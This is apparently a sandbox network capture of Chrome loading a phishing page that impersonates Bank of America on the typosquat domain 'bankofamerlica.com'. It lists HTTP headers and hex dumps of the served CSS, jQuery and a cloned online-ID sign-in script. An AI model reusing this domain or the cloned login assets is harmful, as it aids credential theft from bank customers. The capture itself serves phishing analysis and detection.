                                                                                              2025-01-15 18:41:57 UTC1716INData Raw: 6c 69 63 79 20 74 68 2c 0d 0a 09 09 23 6f 74 2d 73 64 6b 2d 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 2d 76 32 2e 6f 74 2d 73 64 6b 2d 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 20 74 64 2c 0d 0a 09 09 23 6f 74 2d 73 64 6b 2d 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 2d 76 32 2e 6f 74 2d 73 64 6b 2d 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 20 74 72 20 7b 0d 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 0d 0a 09 09 7d 0d 0a 09 09 23 6f 74 2d 73 64 6b 2d 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 2d 76 32 2e 6f 74 2d 73 64 6b 2d 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 20 74 61 62 6c 65 20 2e 6f 74 2d 68 6f 73 74 2c 0d 0a 09 09 23 6f 74 2d 73 64 6b 2d 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 2d 76 32 2e 6f 74 2d 73 64 6b 2d 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 20 74
                                                                                              Data Ascii: licy th,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy td,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy tr {display: block}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy table .ot-host,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy t


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              11192.168.2.1659079188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:41:56 UTC815OUTGET /assets/special/css/loader.css HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: text/css,*/*;q=0.1
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: style
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:41:56 UTC272INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:41:56 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Dec 2022 12:28:14 GMT
                                                                                              ETag: "1434-5eff11a7b5380"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 5172
                                                                                              Vary: Accept-Encoding
                                                                                              Connection: close
                                                                                              Content-Type: text/css
                                                                                              2025-01-15 18:41:56 UTC5172INData Raw: 0d 0a 0d 0a 2e 6c 6f 61 64 65 72 20 7b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0d 0a 20 20 74 6f 70 3a 20 34 34 25 3b 0d 0a 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 62 6f 74 74 6f 6d 3a 20 30 3b 0d 0a 20 20 6c 65 66 74 3a 20 30 3b 0d 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 39 39 39 39 3b 0d 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 7d 0d 0a 0d 0a 2e 6c 6f 61 64 65 72 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 20 31 31 70 78 3b 0d 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 77 69 64 74 68 3a
                                                                                              Data Ascii: .loader { position: fixed; top: 44%; right: 0; bottom: 0; left: 0; z-index: 9999; margin: 0; text-align: center;}.loader:before { content: ""; display: block; margin: 0 auto 11px; text-align: center; width:


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              12192.168.2.1659077188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:41:56 UTC795OUTGET /assets/vipaa-v4-jawr.js HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: script
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:41:57 UTC291INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:41:56 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Wed, 21 Feb 2024 11:42:48 GMT
                                                                                              ETag: "2aa8e2-611e2d371de00"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 2795746
                                                                                              Vary: Accept-Encoding
                                                                                              Connection: close
                                                                                              Content-Type: application/javascript
                                                                                              2025-01-15 18:41:57 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 20 21 20 66 75 6e 63 74 69 6f 6e 28 65 2c 20 74 29 20 7b 0a 20 20 20 20 22 6f 62 6a 65 63 74 22 20 3d 3d 20 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 20 26 26 20 22 6f 62 6a 65 63 74 22 20 3d 3d 20 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3f 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3d 20 65 2e 64 6f 63 75 6d 65 6e 74 20 3f 20 74 28 65 2c 20 21 30 29 20 3a 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 20 7b 0a
                                                                                              Data Ascii: /*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */ ! function(e, t) { "object" == typeof module && "object" == typeof module.exports ? module.exports = e.document ? t(e, !0) : function(e) { if (!e.document) {
                                                                                              2025-01-15 18:41:57 UTC16384INData Raw: 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 20 3d 20 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 43 2e 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 28 22 22 29 29 2c 20 21 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 2a 22 29 2e 6c 65 6e 67 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 2c 20 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 20 3d 20 4b 2e 74 65 73 74 28 43 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 2c 20 64 2e 67 65 74 42 79 49 64 20 3d 20 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii: ElementsByTagName = ce(function(e) { return e.appendChild(C.createComment("")), !e.getElementsByTagName("*").length }), d.getElementsByClassName = K.test(C.getElementsByClassName), d.getById = ce(function(e) {
                                                                                              2025-01-15 18:41:57 UTC16384INData Raw: 73 20 3d 20 66 28 65 2e 72 65 70 6c 61 63 65 28 24 2c 20 22 24 31 22 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 73 5b 53 5d 20 3f 20 6c 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 20 74 2c 20 6e 2c 20 72 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 69 2c 20 6f 20 3d 20 73 28 65 2c 20 6e 75 6c 6c 2c 20 72 2c 20 5b 5d 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 20 3d 20 65 2e 6c 65 6e 67 74 68 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 61 2d 2d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii: s = f(e.replace($, "$1")); return s[S] ? le(function(e, t, n, r) { var i, o = s(e, null, r, []), a = e.length; while (a--) {
                                                                                              2025-01-15 18:41:57 UTC16384INData Raw: 61 70 65 53 65 6c 65 63 74 6f 72 20 3d 20 64 2e 65 73 63 61 70 65 3b 0a 20 20 20 20 76 61 72 20 68 20 3d 20 66 75 6e 63 74 69 6f 6e 28 65 2c 20 74 2c 20 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 72 20 3d 20 5b 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 20 3d 20 76 6f 69 64 20 30 20 21 3d 3d 20 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 28 65 20 3d 20 65 5b 74 5d 29 20 26 26 20 39 20 21 3d 3d 20 65 2e 6e 6f 64 65 54 79 70 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 31 20 3d 3d 3d 20 65 2e 6e 6f 64 65 54 79 70 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 20 26 26 20 53 28 65 29 2e 69 73 28 6e 29 29 20 7b 0a 20 20 20 20 20
                                                                                              Data Ascii: apeSelector = d.escape; var h = function(e, t, n) { var r = [], i = void 0 !== n; while ((e = e[t]) && 9 !== e.nodeType) { if (1 === e.nodeType) { if (i && S(e).is(n)) {
                                                                                              2025-01-15 18:41:57 UTC16384INData Raw: 61 63 65 28 7a 2c 20 55 29 0a 20 20 20 20 7d 0a 20 20 20 20 76 61 72 20 56 20 3d 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 31 20 3d 3d 3d 20 65 2e 6e 6f 64 65 54 79 70 65 20 7c 7c 20 39 20 3d 3d 3d 20 65 2e 6e 6f 64 65 54 79 70 65 20 7c 7c 20 21 2b 65 2e 6e 6f 64 65 54 79 70 65 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 47 28 29 20 7b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 65 78 70 61 6e 64 6f 20 3d 20 53 2e 65 78 70 61 6e 64 6f 20 2b 20 47 2e 75 69 64 2b 2b 0a 20 20 20 20 7d 0a 20 20 20 20 47 2e 75 69 64 20 3d 20 31 2c 20 47 2e 70 72 6f 74 6f 74 79 70 65 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 63 61 63 68 65 3a 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii: ace(z, U) } var V = function(e) { return 1 === e.nodeType || 9 === e.nodeType || !+e.nodeType }; function G() { this.expando = S.expando + G.uid++ } G.uid = 1, G.prototype = { cache: function(e) {
                                                                                              2025-01-15 18:41:57 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 2e 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 28 75 29 20 26 26 20 59 2e 72 65 6d 6f 76 65 28 65 2c 20 22 68 61 6e 64 6c 65 20 65 76 65 6e 74 73 22 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 64 69 73 70 61 74 63 68 3a 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 2c 20 6e 2c 20 72 2c 20 69 2c 20 6f 2c 20 61 2c 20 73 20 3d 20 6e 65 77 20 41 72 72 61 79 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 20 3d 20 53 2e 65 76 65 6e 74 2e
                                                                                              Data Ascii: } } S.isEmptyObject(u) && Y.remove(e, "handle events") } }, dispatch: function(e) { var t, n, r, i, o, a, s = new Array(arguments.length), u = S.event.
                                                                                              2025-01-15 18:41:57 UTC16384INData Raw: 74 79 6c 65 3b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 28 6e 20 3d 20 6e 20 7c 7c 20 49 65 28 65 29 29 20 26 26 20 28 22 22 20 21 3d 3d 20 28 61 20 3d 20 6e 2e 67 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 74 29 20 7c 7c 20 6e 5b 74 5d 29 20 7c 7c 20 69 65 28 65 29 20 7c 7c 20 28 61 20 3d 20 53 2e 73 74 79 6c 65 28 65 2c 20 74 29 29 2c 20 21 79 2e 70 69 78 65 6c 42 6f 78 53 74 79 6c 65 73 28 29 20 26 26 20 4d 65 2e 74 65 73 74 28 61 29 20 26 26 20 46 65 2e 74 65 73 74 28 74 29 20 26 26 20 28 72 20 3d 20 73 2e 77 69 64 74 68 2c 20 69 20 3d 20 73 2e 6d 69 6e 57 69 64 74 68 2c 20 6f 20 3d 20 73 2e 6d 61 78 57 69 64 74 68 2c 20 73 2e 6d 69 6e 57 69 64 74 68 20 3d 20 73 2e 6d 61 78 57 69 64 74 68 20 3d 20 73 2e 77 69 64 74 68 20 3d 20 61 2c 20 61
                                                                                              Data Ascii: tyle; return (n = n || Ie(e)) && ("" !== (a = n.getPropertyValue(t) || n[t]) || ie(e) || (a = S.style(e, t)), !y.pixelBoxStyles() && Me.test(a) && Fe.test(t) && (r = s.width, i = s.minWidth, o = s.maxWidth, s.minWidth = s.maxWidth = s.width = a, a
                                                                                              2025-01-15 18:41:57 UTC16384INData Raw: 20 20 20 64 5b 72 5d 20 3d 20 76 20 26 26 20 76 5b 72 5d 20 7c 7c 20 53 2e 73 74 79 6c 65 28 65 2c 20 72 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 75 20 3d 20 21 53 2e 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 28 74 29 29 20 7c 7c 20 21 53 2e 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 28 64 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 72 20 69 6e 20 66 20 26 26 20 31 20 3d 3d 3d 20 65 2e 6e 6f 64 65 54 79 70 65 20 26 26 20 28 6e 2e 6f 76 65 72 66 6c 6f 77 20 3d 20 5b 68 2e 6f 76 65 72 66 6c 6f 77 2c 20 68 2e 6f 76 65 72 66 6c 6f 77 58 2c 20 68 2e 6f 76 65 72 66 6c 6f 77 59 5d 2c 20 6e 75 6c 6c 20 3d 3d 20 28 6c 20 3d 20
                                                                                              Data Ascii: d[r] = v && v[r] || S.style(e, r) } } if ((u = !S.isEmptyObject(t)) || !S.isEmptyObject(d)) { for (r in f && 1 === e.nodeType && (n.overflow = [h.overflow, h.overflowX, h.overflowY], null == (l =
                                                                                              2025-01-15 18:41:57 UTC16384INData Raw: 2c 20 65 2e 72 65 73 75 6c 74 20 3d 20 76 6f 69 64 20 30 2c 20 65 2e 74 61 72 67 65 74 20 7c 7c 20 28 65 2e 74 61 72 67 65 74 20 3d 20 6e 29 2c 20 74 20 3d 20 6e 75 6c 6c 20 3d 3d 20 74 20 3f 20 5b 65 5d 20 3a 20 53 2e 6d 61 6b 65 41 72 72 61 79 28 74 2c 20 5b 65 5d 29 2c 20 63 20 3d 20 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 5b 64 5d 20 7c 7c 20 7b 7d 2c 20 72 20 7c 7c 20 21 63 2e 74 72 69 67 67 65 72 20 7c 7c 20 21 31 20 21 3d 3d 20 63 2e 74 72 69 67 67 65 72 2e 61 70 70 6c 79 28 6e 2c 20 74 29 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 72 20 26 26 20 21 63 2e 6e 6f 42 75 62 62 6c 65 20 26 26 20 21 78 28 6e 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 73 20 3d 20 63 2e
                                                                                              Data Ascii: , e.result = void 0, e.target || (e.target = n), t = null == t ? [e] : S.makeArray(t, [e]), c = S.event.special[d] || {}, r || !c.trigger || !1 !== c.trigger.apply(n, t))) { if (!r && !c.noBubble && !x(n)) { for (s = c.
                                                                                              2025-01-15 18:41:57 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 7b 0a 20 20
                                                                                              Data Ascii: } } } } } } } return {


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              13192.168.2.1659081188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:41:58 UTC815OUTGET /assets/online-id-vipaa-module-enter-skin.js HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: script
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:41:58 UTC287INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:41:58 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Wed, 21 Feb 2024 13:17:16 GMT
                                                                                              ETag: "ce78-611e42548af00"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 52856
                                                                                              Vary: Accept-Encoding
                                                                                              Connection: close
                                                                                              Content-Type: application/javascript
                                                                                              2025-01-15 18:41:58 UTC16384INData Raw: 24 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 0a 20 20 20 20 20 20 0a 20 20 20 20 69 66 20 28 24 28 27 2e 6f 6e 6c 69 6e 65 2d 69 64 2d 76 69 70 61 61 2d 6d 6f 64 75 6c 65 20 2e 65 6e 74 65 72 2d 73 6b 69 6e 27 29 2e 6c 65 6e 67 74 68 20 3e 20 30 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 2f 2f 43 68 65 63 6b 20 70 6f 6c 69 63 79 20 63 61 6c 6c 0a 20 20 20 20 20 20 20 20 2f 2f 6f 6e 6c 69 6e 65 2d 69 64 2d 73 65 6c 65 63 74 20 66 6f 72 20 73 61 76 65 64 20 6f 69 64 73 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 69 64 73 65 6c 65 63 74 20 3d 20 24 28 27 73 65 6c 65 63 74 23 6f 6e 6c 69 6e 65 2d 69 64 2d 73 65 6c 65 63 74 27 29 3b 0a 20 20 20 20 20 20 20 20 2f 2f 6f 6e 6c 69 6e 65 2d 69 64 2d 69 6e 70 75 74 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 69 64 69
                                                                                              Data Ascii: $(function () { if ($('.online-id-vipaa-module .enter-skin').length > 0) { //Check policy call //online-id-select for saved oids var oidselect = $('select#online-id-select'); //online-id-input var oidi
                                                                                              2025-01-15 18:41:58 UTC16384INData Raw: 73 73 28 27 64 69 73 70 6c 61 79 4e 6f 6e 65 27 29 3b 0a 09 09 09 09 09 24 28 27 23 73 69 67 6e 69 6e 2d 6d 6f 62 69 6c 65 2d 61 70 70 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 6d 6f 62 69 6c 65 2d 61 70 70 27 29 3b 20 0a 09 09 09 09 09 24 28 27 23 64 69 67 69 74 61 6c 2d 69 64 2d 67 65 6e 65 72 61 6c 2d 65 72 72 6f 72 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 27 29 3b 0a 09 09 09 09 09 24 28 27 23 64 69 67 69 74 61 6c 2d 69 64 2d 73 75 63 63 65 73 73 2d 6d 65 73 73 61 67 65 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 27 29 3b 0a 09 09 09 09 09 24 28 27 23 65 6e 74 65 72 49 44 2d 69 6e 70 75 74 27 29 2e 70 61 72 65 6e 74 28 27 64 69 76 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 27 29 3b 0a 09 09 09 09 09 24
                                                                                              Data Ascii: ss('displayNone');$('#signin-mobile-app').removeClass('mobile-app'); $('#digital-id-general-error').addClass('hidden');$('#digital-id-success-message').addClass('hidden');$('#enterID-input').parent('div').addClass('hidden');$
                                                                                              2025-01-15 18:41:58 UTC16384INData Raw: 09 7d 0a 09 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 7d 2c 32 30 30 30 29 3b 0a 09 09 09 7d 0a 09 09 7d 29 3b 0a 09 7d 29 3b 0a 7d 0a 0a 77 69 6e 64 6f 77 2e 62 6f 61 2e 6f 69 64 56 69 70 61 61 4d 6f 64 75 6c 65 20 3d 20 77 69 6e 64 6f 77 2e 62 6f 61 2e 6f 69 64 56 69 70 61 61 4d 6f 64 75 6c 65 20 7c 7c 20 7b 7d 3b 0a 0a 77 69 6e 64 6f 77 2e 62 6f 61 2e 6f 69 64 56 69 70 61 61 4d 6f 64 75 6c 65 2e 66 6f 72 6d 53 75 62 6d 69 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 76 61 72 20 74 68 61 74 20 3d 20 24 28 27 61 5b 6e 61 6d 65 3d 22 65 6e 74 65 72 2d 6f 6e 6c 69 6e 65 2d 69 64 2d 73 75 62 6d 69 74 22 5d 27 29 3b 0a 09 69 66 20 28 20 74 68 61 74 2e 70 61 72 65 6e 74 73 28 27 2e 73 69 6d 70 6c 65 2d 66 6f 72 6d 27 29 2e 61 74 74 72 28 27 69 64
                                                                                              Data Ascii: }}},2000);}});});}window.boa.oidVipaaModule = window.boa.oidVipaaModule || {};window.boa.oidVipaaModule.formSubmit = function(){var that = $('a[name="enter-online-id-submit"]');if ( that.parents('.simple-form').attr('id
                                                                                              2025-01-15 18:41:58 UTC3704INData Raw: 09 09 09 09 09 72 65 71 75 69 72 65 64 3a 20 22 50 6f 72 20 66 61 76 6f 72 2c 20 69 6e 64 69 71 75 65 20 74 6f 64 61 20 6c 61 20 69 6e 66 6f 72 6d 61 63 69 26 23 32 34 33 3b 6e 20 73 6f 6c 69 63 69 74 61 64 61 20 70 61 72 61 20 63 6f 6e 74 69 6e 75 61 72 2e 22 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 7d 2c 0a 09 09 09 09 09 72 75 6c 65 73 3a 20 7b 0a 09 09 09 09 09 09 22 65 6e 74 65 72 49 44 2d 6b 6e 6f 77 6e 2d 69 6e 70 75 74 22 3a 20 7b 0a 09 09 09 09 09 09 09 72 65 71 75 69 72 65 64 20 3a 20 7b 0a 09 09 09 09 09 09 09 64 65 70 65 6e 64 73 3a 20 66 75 6e 63 74 69 6f 6e 28 65 6c 65 6d 65 6e 74 29 20 7b 0a 09 09 09 09 09 09 09 09 09 09 09 09 72 65 74 75 72 6e 20 24 28 22 23 65 6e 74 65 72 2d 69 64 2d 64 69 76 22 29 2e 69 73 28 22 3a 76 69 73 69 62 6c
                                                                                              Data Ascii: required: "Por favor, indique toda la informaci&#243;n solicitada para continuar."}},rules: {"enterID-known-input": {required : {depends: function(element) {return $("#enter-id-div").is(":visibl


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              14192.168.2.1659082188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:41:58 UTC855OUTGET /assets/mobile_llama.png HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
